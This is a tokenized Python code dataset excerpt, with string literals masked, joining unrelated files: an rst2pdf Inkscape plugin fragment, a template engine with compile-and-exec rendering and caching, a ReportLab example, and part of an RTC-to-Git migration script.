'<STR_LIT>' , pngfname , '<STR_LIT>' , str ( client . def_dpi ) ] <EOL> try : <EOL> subprocess . call ( cmd ) <EOL> return pngfname <EOL> except OSError , e : <EOL> log . error ( "<STR_LIT>" , '<STR_LIT:U+0020>' . join ( cmd ) ) <EOL> raise <EOL> return None <EOL> def install ( createpdf , options ) : <EOL> '''<STR_LIT>''' <EOL> rst2pdf . image . SVGImage = InkscapeImage </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" [ <NUM_LIT:6> : - <NUM_LIT:2> ] <EOL> __release__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:html>' , ] <EOL> import re , sys , os , time , marshal <EOL> try : <EOL> import fcntl <EOL> def _lock_file ( file , content ) : <EOL> fcntl . flock ( file . fileno ( ) , fcntl . LOCK_EX ) <EOL> except ImportError , ex : <EOL> try : <EOL> import msvcrt <EOL> def _lock_file ( file , content ) : <EOL> msvcrt . locking ( file . fileno ( ) , msvcrt . LK_LOCK , len ( content ) ) <EOL> except ImportError , ex : <EOL> def _lock_file ( file , content ) : <EOL> pass <EOL> def _write_file_with_lock ( filename , content ) : <EOL> f = None <EOL> try : <EOL> f = open ( filename , '<STR_LIT:wb>' ) <EOL> _lock_file ( f , content ) <EOL> f . write ( content ) <EOL> finally : <EOL> if f : <EOL> f . close ( ) <EOL> def _create_module ( module_name ) : <EOL> """<STR_LIT>""" <EOL> import new <EOL> mod = new . module ( module_name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] ) <EOL> sys . modules [ module_name ] = mod <EOL> return mod <EOL> def _create_helpers_module ( ) : <EOL> def to_str ( val ) : <EOL> """<STR_LIT>""" <EOL> if val is None : return '<STR_LIT>' <EOL> if isinstance ( val , str ) : return val <EOL> if isinstance ( val , unicode ) : return val <EOL> return str ( val ) <EOL> def generate_tostrfunc ( encoding ) : <EOL> """<STR_LIT>""" <EOL> def to_str ( val ) : <EOL> if val is None : return '<STR_LIT>' <EOL> if isinstance ( val , str ) : return val <EOL> if isinstance ( val , unicode ) : return val . encode ( encoding ) <EOL> return str ( val ) <EOL> return to_str <EOL> def echo ( string ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> context = frame . f_locals <EOL> context [ '<STR_LIT>' ] . append ( string ) <EOL> def start_capture ( varname = None ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> context = frame . f_locals <EOL> context [ '<STR_LIT>' ] = context [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = varname <EOL> context [ '<STR_LIT>' ] = [ ] <EOL> def stop_capture ( store_to_context = True ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> context = frame . f_locals <EOL> result = '<STR_LIT>' . join ( context [ '<STR_LIT>' ] ) <EOL> context [ '<STR_LIT>' ] = context . pop ( '<STR_LIT>' ) <EOL> varname = context . pop ( '<STR_LIT>' ) <EOL> if varname : <EOL> context [ varname ] = result <EOL> if store_to_context : <EOL> context [ '<STR_LIT>' ] [ varname ] = result <EOL> return result <EOL> def captured_as ( name ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> context = frame . f_locals <EOL> if context . has_key ( name ) : <EOL> _buf = context [ '<STR_LIT>' ] <EOL> _buf . append ( context [ name ] ) <EOL> return True <EOL> return False <EOL> def _p ( arg ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % arg <EOL> def _P ( arg ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % arg <EOL> def _decode_params ( s ) : <EOL> """<STR_LIT>""" <EOL> from urllib import unquote <EOL> dct = { '<STR_LIT>' : '<STR_LIT:<>' , '<STR_LIT>' : '<STR_LIT:>>' , '<STR_LIT>' : '<STR_LIT:&>' , '<STR_LIT>' : '<STR_LIT:">' , '<STR_LIT>' : "<STR_LIT:'>" , } <EOL> def unescape ( s ) : <EOL> return re . sub ( r'<STR_LIT>' , lambda m : dct [ m . group ( <NUM_LIT:1> ) ] , s ) <EOL> s = re . sub ( r'<STR_LIT>' , lambda m : '<STR_LIT>' % unquote ( m . group ( <NUM_LIT:1> ) ) , s ) <EOL> s = re . sub ( r'<STR_LIT>' , lambda m : '<STR_LIT>' % unquote ( m . group ( <NUM_LIT:1> ) ) , s ) <EOL> s = re . sub ( r'<STR_LIT>' , lambda m : '<STR_LIT>' % unescape ( m . group ( <NUM_LIT:1> ) ) , s ) <EOL> s = re . sub ( r'<STR_LIT>' , lambda m : '<STR_LIT>' % unescape ( m . group ( <NUM_LIT:1> ) ) , s ) <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , s ) <EOL> return s <EOL> mod = _create_module ( '<STR_LIT>' ) <EOL> mod . to_str = to_str <EOL> mod . generate_tostrfunc = generate_tostrfunc <EOL> mod . echo = echo <EOL> mod . start_capture = start_capture <EOL> mod . stop_capture = stop_capture <EOL> mod . captured_as = captured_as <EOL> mod . _p = _p <EOL> mod . _P = _P <EOL> mod . _decode_params = _decode_params <EOL> mod . __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> return mod <EOL> helpers = _create_helpers_module ( ) <EOL> del _create_helpers_module <EOL> generate_tostrfunc = helpers . generate_tostrfunc <EOL> def _create_html_module ( ) : <EOL> to_str = helpers . to_str <EOL> _escape_table = { '<STR_LIT:&>' : '<STR_LIT>' , '<STR_LIT:<>' : '<STR_LIT>' , '<STR_LIT:>>' : '<STR_LIT>' , '<STR_LIT:">' : '<STR_LIT>' } <EOL> _escape_pattern = re . compile ( r'<STR_LIT>' ) <EOL> _escape_callable = lambda m : _escape_table [ m . group ( <NUM_LIT:0> ) ] <EOL> def escape_xml ( s ) : <EOL> """<STR_LIT>""" <EOL> return _escape_pattern . sub ( _escape_callable , s ) <EOL> def tagattr ( name , expr , value = None , escape = True ) : <EOL> """<STR_LIT>""" <EOL> if not expr : <EOL> return '<STR_LIT>' <EOL> if value is None : <EOL> value = to_str ( expr ) <EOL> else : <EOL> value = to_str ( value ) <EOL> if escape : <EOL> value = escape_xml ( value ) <EOL> return '<STR_LIT>' % ( name , value ) <EOL> def checked ( expr ) : <EOL> """<STR_LIT>""" <EOL> return expr and '<STR_LIT>' or '<STR_LIT>' <EOL> def selected ( expr ) : <EOL> """<STR_LIT>""" <EOL> return expr and '<STR_LIT>' or '<STR_LIT>' <EOL> def disabled ( expr ) : <EOL> """<STR_LIT>""" <EOL> return expr and '<STR_LIT>' or '<STR_LIT>' <EOL> def nl2br ( text ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return '<STR_LIT>' <EOL> return text . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> def text2html ( text ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return '<STR_LIT>' <EOL> return nl2br ( escape_xml ( text ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) ) <EOL> mod = _create_module ( '<STR_LIT>' ) <EOL> mod . _escape_table = _escape_table <EOL> mod . escape_xml = escape_xml <EOL> mod . escape = escape_xml <EOL> mod . tagattr = tagattr <EOL> mod . checked = checked <EOL> mod . selected = selected <EOL> mod . disabled = disabled <EOL> mod . nl2br = nl2br <EOL> mod . text2html = text2html <EOL> return mod <EOL> helpers . html = _create_html_module ( ) <EOL> del _create_html_module <EOL> helpers . escape = helpers . html . escape_xml <EOL> class Template ( object ) : <EOL> """<STR_LIT>""" <EOL> filename = None <EOL> encoding = None <EOL> escapefunc = '<STR_LIT>' <EOL> tostrfunc = '<STR_LIT>' <EOL> indent = <NUM_LIT:4> <EOL> preamble = None <EOL> postamble = None <EOL> smarttrim = None <EOL> args = None <EOL> def __init__ ( self , filename = None , encoding = None , escapefunc = None , tostrfunc = None , indent = None , preamble = None , postamble = None , smarttrim = None ) : <EOL> """<STR_LIT>""" <EOL> if encoding is not None : self . encoding = encoding <EOL> if escapefunc is not None : self . escapefunc = escapefunc <EOL> if tostrfunc is not None : self . tostrfunc = tostrfunc <EOL> if indent is not None : self . indent = indent <EOL> if preamble is not None : self . preamble = preamble <EOL> if postamble is not None : self . postamble = postamble <EOL> if smarttrim is not None : self . smarttrim = smarttrim <EOL> if preamble is True : self . preamble = "<STR_LIT>" <EOL> if postamble is True : self . postamble = "<STR_LIT>" <EOL> if filename : <EOL> self . convert_file ( filename ) <EOL> else : <EOL> self . _reset ( ) <EOL> def _reset ( self , input = None , filename = None ) : <EOL> self . _spaces = '<STR_LIT>' <EOL> self . script = None <EOL> self . bytecode = None <EOL> self . input = input <EOL> self . filename = filename <EOL> if input != None : <EOL> i = input . find ( "<STR_LIT:\n>" ) <EOL> if i < <NUM_LIT:0> : <EOL> self . newline = "<STR_LIT:\n>" <EOL> elif len ( input ) >= <NUM_LIT:2> and input [ i - <NUM_LIT:1> ] == "<STR_LIT:\r>" : <EOL> self . newline = "<STR_LIT:\r\n>" <EOL> else : <EOL> self . newline = "<STR_LIT:\n>" <EOL> def before_convert ( self , buf ) : <EOL> if self . preamble : <EOL> buf . append ( self . preamble ) <EOL> buf . append ( self . input . startswith ( '<STR_LIT>' ) and "<STR_LIT:\n>" or "<STR_LIT>" ) <EOL> def after_convert ( self , buf ) : <EOL> if self . postamble : <EOL> if not buf [ - <NUM_LIT:1> ] . endswith ( "<STR_LIT:\n>" ) : <EOL> buf . append ( "<STR_LIT:\n>" ) <EOL> buf . append ( self . postamble + "<STR_LIT:\n>" ) <EOL> def convert_file ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> input = open ( filename , '<STR_LIT:rb>' ) . read ( ) <EOL> return self . convert ( input , filename ) <EOL> def convert ( self , input , filename = None ) : <EOL> """<STR_LIT>""" <EOL> if self . encoding and isinstance ( input , str ) : <EOL> input = input . decode ( self . encoding ) <EOL> self . _reset ( input , filename ) <EOL> buf = [ ] <EOL> self . before_convert ( buf ) <EOL> self . parse_stmts ( buf , input ) <EOL> self . after_convert ( buf ) <EOL> script = '<STR_LIT>' . join ( buf ) <EOL> self . script = script <EOL> return script <EOL> def compile_stmt_pattern ( pi ) : <EOL> return re . compile ( r'<STR_LIT>' % pi , re . S ) <EOL> STMT_PATTERN = compile_stmt_pattern ( '<STR_LIT>' ) <EOL> compile_stmt_pattern = staticmethod ( compile_stmt_pattern ) <EOL> def stmt_pattern ( self ) : <EOL> return Template . STMT_PATTERN <EOL> def parse_stmts ( self , buf , input ) : <EOL> if not input : <EOL> return <EOL> rexp = self . stmt_pattern ( ) <EOL> is_bol = True <EOL> index = <NUM_LIT:0> <EOL> for m in rexp . finditer ( input ) : <EOL> mspace , code , rspace = m . groups ( ) <EOL> text = input [ index : m . start ( ) ] <EOL> index = m . end ( ) <EOL> lspace = None <EOL> if text == '<STR_LIT>' : <EOL> if is_bol : <EOL> lspace = '<STR_LIT>' <EOL> elif text [ - <NUM_LIT:1> ] == '<STR_LIT:\n>' : <EOL> lspace = '<STR_LIT>' <EOL> else : <EOL> rindex = text . rfind ( '<STR_LIT:\n>' ) <EOL> if rindex < <NUM_LIT:0> : <EOL> if is_bol and text . isspace ( ) : <EOL> lspace = text <EOL> text = '<STR_LIT>' <EOL> else : <EOL> s = text [ rindex + <NUM_LIT:1> : ] <EOL> if s . isspace ( ) : <EOL> lspace = s <EOL> text = text [ : rindex + <NUM_LIT:1> ] <EOL> self . parse_exprs ( buf , text , is_bol ) <EOL> is_bol = rspace is not None <EOL> if lspace : <EOL> buf . append ( lspace ) <EOL> if mspace != "<STR_LIT:U+0020>" : <EOL> buf . append ( mspace == "<STR_LIT:\t>" and "<STR_LIT:\t>" or "<STR_LIT:\n>" ) <EOL> if code : <EOL> code = self . statement_hook ( code ) <EOL> self . add_stmt ( buf , code ) <EOL> self . _set_spaces ( code , lspace , mspace ) <EOL> if rspace : <EOL> buf . append ( "<STR_LIT:\n>" ) <EOL> rest = input [ index : ] <EOL> if rest : <EOL> self . parse_exprs ( buf , rest ) <EOL> def statement_hook ( self , stmt ) : <EOL> """<STR_LIT>""" <EOL> if self . args is None : <EOL> args_pattern = r'<STR_LIT>' <EOL> m = re . match ( args_pattern , stmt ) <EOL> if m : <EOL> arr = ( m . group ( <NUM_LIT:1> ) or '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) <EOL> args = [ ] ; declares = [ ] <EOL> for s in arr : <EOL> arg = s . strip ( ) <EOL> if not s : continue <EOL> if not re . match ( '<STR_LIT>' , arg ) : <EOL> raise ValueError ( "<STR_LIT>" % arg ) <EOL> args . append ( arg ) <EOL> declares . append ( "<STR_LIT>" % ( arg , arg ) ) <EOL> self . args = args <EOL> return '<STR_LIT>' . join ( declares ) <EOL> return stmt <EOL> EXPR_PATTERN = re . compile ( r'<STR_LIT>' , re . S ) <EOL> def expr_pattern ( self ) : <EOL> return Template . EXPR_PATTERN <EOL> def get_expr_and_escapeflag ( self , match ) : <EOL> return match . group ( <NUM_LIT:2> ) , match . group ( <NUM_LIT:1> ) == '<STR_LIT:$>' <EOL> def parse_exprs ( self , buf , input , is_bol = False ) : <EOL> if not input : <EOL> return <EOL> if self . _spaces : <EOL> buf . append ( self . _spaces ) <EOL> self . start_text_part ( buf ) <EOL> rexp = self . expr_pattern ( ) <EOL> smarttrim = self . smarttrim <EOL> nl = self . newline <EOL> nl_len = len ( nl ) <EOL> pos = <NUM_LIT:0> <EOL> for m in rexp . finditer ( input ) : <EOL> start = m . start ( ) <EOL> text = input [ pos : start ] <EOL> pos = m . end ( ) <EOL> expr , flag_escape = self . get_expr_and_escapeflag ( m ) <EOL> if text : <EOL> self . add_text ( buf , text ) <EOL> self . add_expr ( buf , expr , flag_escape ) <EOL> if smarttrim : <EOL> flag_bol = text . endswith ( nl ) or not text and ( start > <NUM_LIT:0> or is_bol ) <EOL> if flag_bol and not flag_escape and input [ pos : pos + nl_len ] == nl : <EOL> pos += nl_len <EOL> buf . append ( "<STR_LIT:\n>" ) <EOL> if smarttrim : <EOL> if buf and buf [ - <NUM_LIT:1> ] == "<STR_LIT:\n>" : <EOL> buf . pop ( ) <EOL> rest = input [ pos : ] <EOL> if rest : <EOL> self . add_text ( buf , rest , True ) <EOL> self . stop_text_part ( buf ) <EOL> if input [ - <NUM_LIT:1> ] == '<STR_LIT:\n>' : <EOL> buf . append ( "<STR_LIT:\n>" ) <EOL> def start_text_part ( self , buf ) : <EOL> buf . append ( "<STR_LIT>" ) <EOL> def stop_text_part ( self , buf ) : <EOL> buf . append ( "<STR_LIT>" ) <EOL> _quote_rexp = re . compile ( r"<STR_LIT>" ) <EOL> def add_text ( self , buf , text , encode_newline = False ) : <EOL> if not text : <EOL> return ; <EOL> if self . encoding : <EOL> buf . append ( "<STR_LIT>" ) <EOL> else : <EOL> buf . append ( "<STR_LIT>" ) <EOL> text = Template . _quote_rexp . sub ( r"<STR_LIT>" , text ) <EOL> if not encode_newline or text [ - <NUM_LIT:1> ] != "<STR_LIT:\n>" : <EOL> buf . append ( text ) <EOL> buf . append ( "<STR_LIT>" ) <EOL> elif len ( text ) >= <NUM_LIT:2> and text [ - <NUM_LIT:2> ] == "<STR_LIT:\r>" : <EOL> buf . append ( text [ <NUM_LIT:0> : - <NUM_LIT:2> ] ) <EOL> buf . append ( "<STR_LIT>" ) <EOL> else : <EOL> buf . append ( text [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) <EOL> buf . append ( "<STR_LIT>" ) <EOL> _add_text = add_text <EOL> def add_expr ( self , buf , code , flag_escape = None ) : <EOL> if not code or code . isspace ( ) : <EOL> return <EOL> if flag_escape is None : <EOL> buf . append ( code ) ; buf . append ( "<STR_LIT:U+002CU+0020>" ) ; <EOL> elif flag_escape is False : <EOL> buf . extend ( ( self . tostrfunc , "<STR_LIT:(>" , code , "<STR_LIT>" ) ) <EOL> else : <EOL> buf . extend ( ( self . escapefunc , "<STR_LIT:(>" , self . tostrfunc , "<STR_LIT:(>" , code , "<STR_LIT>" ) ) <EOL> def add_stmt ( self , buf , code ) : <EOL> if self . newline == "<STR_LIT:\r\n>" : <EOL> code = code . replace ( "<STR_LIT:\r\n>" , "<STR_LIT:\n>" ) <EOL> buf . append ( code ) <EOL> def _set_spaces ( self , code , lspace , mspace ) : <EOL> if lspace : <EOL> if mspace == "<STR_LIT:U+0020>" : <EOL> code = lspace + code <EOL> elif mspace == "<STR_LIT:\t>" : <EOL> code = lspace + "<STR_LIT:\t>" + code <EOL> i = code . rstrip ( ) . rfind ( "<STR_LIT:\n>" ) + <NUM_LIT:1> <EOL> indent = <NUM_LIT:0> <EOL> n = len ( code ) <EOL> ch = None <EOL> while i < n : <EOL> ch = code [ i ] <EOL> if ch == "<STR_LIT:U+0020>" : indent += <NUM_LIT:1> <EOL> elif ch == "<STR_LIT:\t>" : indent += <NUM_LIT:8> <EOL> else : break <EOL> i += <NUM_LIT:1> <EOL> if ch : <EOL> if code . rstrip ( ) [ - <NUM_LIT:1> ] == '<STR_LIT::>' : <EOL> indent += self . indent <EOL> self . _spaces = '<STR_LIT:U+0020>' * indent <EOL> def render ( self , context = None , globals = None , _buf = None ) : <EOL> """<STR_LIT>""" <EOL> if context is None : <EOL> locals = context = { } <EOL> elif self . args is None : <EOL> locals = context . copy ( ) <EOL> else : <EOL> locals = { } <EOL> if context . has_key ( '<STR_LIT>' ) : <EOL> context . get ( '<STR_LIT>' ) . hook_context ( locals ) <EOL> locals [ '<STR_LIT>' ] = context <EOL> if globals is None : <EOL> globals = sys . _getframe ( <NUM_LIT:1> ) . f_globals <EOL> bufarg = _buf <EOL> if _buf is None : <EOL> _buf = [ ] <EOL> locals [ '<STR_LIT>' ] = _buf <EOL> if not self . bytecode : <EOL> self . compile ( ) <EOL> exec self . bytecode in globals , locals <EOL> if bufarg is None : <EOL> s = '<STR_LIT>' . join ( _buf ) <EOL> return s <EOL> else : <EOL> return None <EOL> def compile ( self ) : <EOL> """<STR_LIT>""" <EOL> self . bytecode = compile ( self . script , self . filename or '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Preprocessor ( Template ) : <EOL> STMT_PATTERN = Template . compile_stmt_pattern ( '<STR_LIT>' ) <EOL> def stmt_pattern ( self ) : <EOL> return Preprocessor . STMT_PATTERN <EOL> EXPR_PATTERN = re . compile ( r'<STR_LIT>' , re . S ) <EOL> def expr_pattern ( self ) : <EOL> return Preprocessor . EXPR_PATTERN <EOL> def add_expr ( self , buf , code , flag_escape = None ) : <EOL> if not code or code . isspace ( ) : <EOL> return <EOL> code = "<STR_LIT>" % code <EOL> Template . add_expr ( self , buf , code , flag_escape ) <EOL> class Engine ( object ) : <EOL> """<STR_LIT>""" <EOL> prefix = '<STR_LIT>' <EOL> postfix = '<STR_LIT>' <EOL> layout = None <EOL> templateclass = Template <EOL> path = None <EOL> cache = False <EOL> preprocess = False <EOL> def __init__ ( self , prefix = None , postfix = None , layout = None , path = None , cache = None , preprocess = None , templateclass = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if prefix : self . prefix = prefix <EOL> if postfix : self . postfix = postfix <EOL> if layout : self . layout = layout <EOL> if templateclass : self . templateclass = templateclass <EOL> if path is not None : self . path = path <EOL> if cache is not None : self . cache = cache <EOL> if preprocess is not None : self . preprocess = preprocess <EOL> self . kwargs = kwargs <EOL> self . templates = { } <EOL> def to_filename ( self , template_name ) : <EOL> """<STR_LIT>""" <EOL> if template_name [ <NUM_LIT:0> ] == '<STR_LIT::>' : <EOL> return self . prefix + template_name [ <NUM_LIT:1> : ] + self . postfix <EOL> return template_name <EOL> def find_template_file ( self , template_name ) : <EOL> """<STR_LIT>""" <EOL> filename = self . to_filename ( template_name ) <EOL> if self . path : <EOL> for dirname in self . path : <EOL> filepath = dirname + os . path . sep + filename <EOL> if os . path . isfile ( filepath ) : <EOL> return filepath <EOL> else : <EOL> if os . path . isfile ( filename ) : <EOL> return filename <EOL> raise IOError ( '<STR_LIT>' % ( filename , repr ( self . path ) ) ) <EOL> def register_template ( self , template_name , template ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( template , '<STR_LIT>' ) : <EOL> template . timestamp = None <EOL> self . templates [ template_name ] = template <EOL> def load_cachefile ( self , cache_filename , template ) : <EOL> """<STR_LIT>""" <EOL> dct = marshal . load ( open ( cache_filename , '<STR_LIT:rb>' ) ) <EOL> template . args = dct [ '<STR_LIT:args>' ] <EOL> template . script = dct [ '<STR_LIT>' ] <EOL> template . bytecode = dct [ '<STR_LIT>' ] <EOL> def _load_cachefile_for_script ( self , cache_filename , template ) : <EOL> s = open ( cache_filename ) . read ( ) <EOL> if s . startswith ( '<STR_LIT>' ) : <EOL> pos = s . find ( "<STR_LIT:\n>" ) <EOL> args_str = s [ len ( '<STR_LIT>' ) : pos ] <EOL> template . args = args_str and args_str . split ( '<STR_LIT:U+002CU+0020>' ) or [ ] <EOL> s = s [ pos + <NUM_LIT:1> : ] <EOL> else : <EOL> template . args = None <EOL> if template . encoding : <EOL> s = s . decode ( '<STR_LIT:utf-8>' ) <EOL> template . script = s <EOL> template . compile ( ) <EOL> def store_cachefile ( self , cache_filename , template ) : <EOL> """<STR_LIT>""" <EOL> dct = { '<STR_LIT:args>' : template . args , <EOL> '<STR_LIT>' : template . script , <EOL> '<STR_LIT>' : template . bytecode } <EOL> _write_file_with_lock ( cache_filename , marshal . dumps ( dct ) ) <EOL> def _store_cachefile_for_script ( self , cache_filename , template ) : <EOL> s = template . script <EOL> if template . encoding and isinstance ( s , unicode ) : <EOL> s = s . encode ( template . encoding ) <EOL> if template . args is not None : <EOL> s = "<STR_LIT>" % ( '<STR_LIT:U+002CU+0020>' . join ( template . args ) , s ) <EOL> _write_file_with_lock ( cache_filename , s ) <EOL> def cachename ( self , filename ) : <EOL> return os . path . join ( os . path . expanduser ( '<STR_LIT>' ) , '<STR_LIT>' , os . path . basename ( filename ) + '<STR_LIT>' ) <EOL> def create_template ( self , filename , _context , _globals ) : <EOL> """<STR_LIT>""" <EOL> template = self . templateclass ( None , ** self . kwargs ) <EOL> template . timestamp = time . time ( ) <EOL> cache_filename = self . cachename ( filename ) <EOL> getmtime = os . path . getmtime <EOL> if not self . cache : <EOL> input = self . read_template_file ( filename , _context , _globals ) <EOL> template . convert ( input , filename ) <EOL> elif os . path . exists ( cache_filename ) and getmtime ( cache_filename ) >= getmtime ( filename ) : <EOL> template . filename = filename <EOL> self . load_cachefile ( cache_filename , template ) <EOL> if template . bytecode is None : <EOL> template . compile ( ) <EOL> else : <EOL> input = self . read_template_file ( filename , _context , _globals ) <EOL> template . convert ( input , filename ) <EOL> template . compile ( ) <EOL> self . store_cachefile ( cache_filename , template ) <EOL> return template <EOL> def read_template_file ( self , filename , _context , _globals ) : <EOL> if not self . preprocess : <EOL> return open ( filename ) . read ( ) <EOL> if _context is None : <EOL> _context = { } <EOL> if not _context . has_key ( '<STR_LIT>' ) : <EOL> self . hook_context ( _context ) <EOL> if _globals is None : <EOL> _globals = sys . _getframe ( <NUM_LIT:2> ) . f_globals <EOL> preprocessor = Preprocessor ( filename ) <EOL> return preprocessor . render ( _context , globals = _globals ) <EOL> def get_template ( self , template_name , _context = None , _globals = None ) : <EOL> """<STR_LIT>""" <EOL> template = self . templates . get ( template_name ) <EOL> t = template <EOL> if t is None or t . timestamp and t . filename and t . timestamp < os . path . getmtime ( t . filename ) : <EOL> filename = self . find_template_file ( template_name ) <EOL> if _globals is None : <EOL> _globals = sys . _getframe ( <NUM_LIT:1> ) . f_globals <EOL> template = self . create_template ( filename , _context , _globals ) <EOL> self . register_template ( template_name , template ) <EOL> return template <EOL> def include ( self , template_name , append_to_buf = True ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> locals = frame . f_locals <EOL> globals = frame . f_globals <EOL> assert locals . has_key ( '<STR_LIT>' ) <EOL> context = locals [ '<STR_LIT>' ] <EOL> template = self . get_template ( template_name , context , globals ) <EOL> if append_to_buf : <EOL> _buf = locals [ '<STR_LIT>' ] <EOL> else : <EOL> _buf = None <EOL> return template . render ( context , globals , _buf = _buf ) <EOL> def render ( self , template_name , context = None , globals = None , layout = True ) : <EOL> """<STR_LIT>""" <EOL> if context is None : <EOL> context = { } <EOL> if globals is None : <EOL> globals = sys . _getframe ( <NUM_LIT:1> ) . f_globals <EOL> self . hook_context ( context ) <EOL> while True : <EOL> template = self . get_template ( template_name , context , globals ) <EOL> content = template . render ( context , globals ) <EOL> layout = context . pop ( '<STR_LIT>' , layout ) <EOL> if layout is True or layout is None : <EOL> layout = self . layout <EOL> if not layout : <EOL> break <EOL> template_name = layout <EOL> layout = False <EOL> context [ '<STR_LIT>' ] = content <EOL> context . pop ( '<STR_LIT>' , None ) <EOL> return content <EOL> def hook_context ( self , context ) : <EOL> context [ '<STR_LIT>' ] = self <EOL> context [ '<STR_LIT>' ] = self . include </s>
<s> from reportlab . platypus import SimpleDocTemplate , Paragraph <EOL> from reportlab . lib . styles import ParagraphStyle <EOL> from reportlab . lib . styles import getSampleStyleSheet <EOL> from reportlab . lib . enums import TA_JUSTIFY <EOL> def go ( ) : <EOL> styles = getSampleStyleSheet ( ) <EOL> doc = SimpleDocTemplate ( "<STR_LIT>" ) <EOL> style = styles [ '<STR_LIT>' ] <EOL> style . alignment = TA_JUSTIFY <EOL> p1 = Paragraph ( '''<STR_LIT>''' , style ) <EOL> doc . build ( [ p1 , ] ) <EOL> go ( ) </s>
<s> import sys <EOL> import os <EOL> import re <EOL> from enum import Enum , unique <EOL> import configuration <EOL> from configuration import ComponentBaseLineEntry <EOL> import sorter <EOL> import shell <EOL> import shouter <EOL> from gitFunctions import Commiter , Differ <EOL> class RTCInitializer : <EOL> @ staticmethod <EOL> def initialize ( ) : <EOL> RTCLogin . loginandcollectstreamuuid ( ) <EOL> workspace = WorkspaceHandler ( ) <EOL> config = configuration . get ( ) <EOL> if config . useexistingworkspace : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> workspace . load ( ) <EOL> else : <EOL> workspace . createandload ( config . streamuuid , config . initialcomponentbaselines ) <EOL> class RTCLogin : <EOL> @ staticmethod <EOL> def loginandcollectstreamuuid ( ) : <EOL> config = configuration . get ( ) <EOL> shell . execute ( "<STR_LIT>" % ( config . scmcommand , config . repo , config . user , config . password ) ) <EOL> config . collectstreamuuids ( ) <EOL> @ staticmethod <EOL> def logout ( ) : <EOL> config = configuration . get ( ) <EOL> shell . execute ( "<STR_LIT>" % ( config . scmcommand , config . repo ) ) <EOL> class WorkspaceHandler : <EOL> def __init__ ( self ) : <EOL> self . config = configuration . get ( ) <EOL> self . workspace = self . config . workspace <EOL> self . repo = self . config . repo <EOL> self . scmcommand = self . config . scmcommand <EOL> def createandload ( self , stream , componentbaselineentries = [ ] ) : <EOL> shell . execute ( "<STR_LIT>" % ( self . scmcommand , self . repo , stream , self . workspace ) ) <EOL> if componentbaselineentries : <EOL> self . setcomponentstobaseline ( componentbaselineentries , stream ) <EOL> else : <EOL> self . setcomponentstobaseline ( ImportHandler ( ) . determineinitialbaseline ( stream ) , <EOL> stream ) <EOL> self . load ( ) <EOL> def load ( self ) : <EOL> command = "<STR_LIT>" % ( self . scmcommand , self . repo , self . workspace ) <EOL> if self . config . includecomponentroots : <EOL> command += "<STR_LIT>" <EOL> shouter . shout ( "<STR_LIT>" + command ) <EOL> shell . execute ( command ) <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> Commiter . restore_shed_gitignore ( Commiter . get_untracked_statuszlines ( ) ) <EOL> def setcomponentstobaseline ( self , componentbaselineentries , streamuuid ) : <EOL> for entry in componentbaselineentries : <EOL> shouter . shout ( "<STR_LIT>" % ( entry . componentname , entry . component , <EOL> entry . baselinename , entry . baseline ) ) <EOL> replacecommand = "<STR_LIT>" % ( self . scmcommand , self . repo , entry . baseline , self . workspace , streamuuid , entry . component ) <EOL> shell . execute ( replacecommand ) <EOL> def setnewflowtargets ( self , streamuuid ) : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> if not self . hasflowtarget ( streamuuid ) : <EOL> shell . execute ( "<STR_LIT>" % ( self . scmcommand , self . repo , self . workspace , streamuuid ) ) <EOL> command = "<STR_LIT>" % ( self . scmcommand , self . repo , self . workspace , streamuuid ) <EOL> shell . execute ( command ) <EOL> def hasflowtarget ( self , streamuuid ) : <EOL> command = "<STR_LIT>" % ( self . scmcommand , self . repo , self . workspace ) <EOL> flowtargetlines = shell . getoutput ( command ) <EOL> for flowtargetline in flowtargetlines : <EOL> splittedinformationline = flowtargetline . split ( "<STR_LIT>" ) <EOL> uuidpart = splittedinformationline [ <NUM_LIT:0> ] . split ( "<STR_LIT:U+0020>" ) <EOL> flowtargetuuid = uuidpart [ <NUM_LIT:0> ] . strip ( ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if streamuuid in flowtargetuuid : <EOL> return True <EOL> return False <EOL> class Changes : <EOL> latest_accept_command = "<STR_LIT>" <EOL> @ staticmethod <EOL> def discard ( * changeentries ) : <EOL> config = configuration . get ( ) <EOL> idstodiscard = Changes . _collectids ( changeentries ) <EOL> exitcode = shell . execute ( config . scmcommand + "<STR_LIT>" + config . workspace + "<STR_LIT>" + config . repo + "<STR_LIT>" + idstodiscard ) <EOL> if exitcode is <NUM_LIT:0> : <EOL> for changeEntry in changeentries : 